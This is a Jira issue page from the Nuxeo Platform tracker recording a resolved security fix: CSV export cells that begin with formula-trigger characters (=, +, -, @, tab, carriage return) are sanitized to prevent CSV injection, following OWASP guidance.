Uploaded image for project: 'Nuxeo Platform'
  1. Nuxeo Platform
  2. NXP-30590

Escape/sanitize the first malicious character of a cell in a CSV export to avoid CSV injection

    XMLWordPrintable

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Major
    • Resolution: Fixed
    • Affects Version/s: 10.10
    • Fix Version/s: 10.10-HF54, 2021.10
    • Component/s: CSV, Security
    • Release Notes Summary:
      The first malicious character of a cell in a CSV export is sanitized to avoid CSV injection.
    • Tags:
    • Backlog priority:
      750
    • Sprint:
      nxplatform #45

      Description

      Following https://owasp.org/www-community/attacks/CSV_Injection Nuxeo should escape (or remove) the first character when a cell starts with

      • Equals to (=)
      • Plus (+)
      • Minus (-)
      • At (@)
      • Tab (0x09)
      • Carriage return (0x0D)

        Attachments

          Issue Links

          causes

          Bug - A problem which impairs or prevents the functions of the product. NXP-31466 Fix CSV export for String values which starts with a dash

          • Minor - Minor loss of function, or other problem where easy workaround is present.
          • Resolved
          Is referenced in

          [Captain Hook] PR for 10.10: #4952 PR for 10.10: #4952

          [Captain Hook] PR for 2021: #254 PR for 2021: #254

            Activity

              People

              • Votes:
                0 Vote for this issue
                Watchers:
                4 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: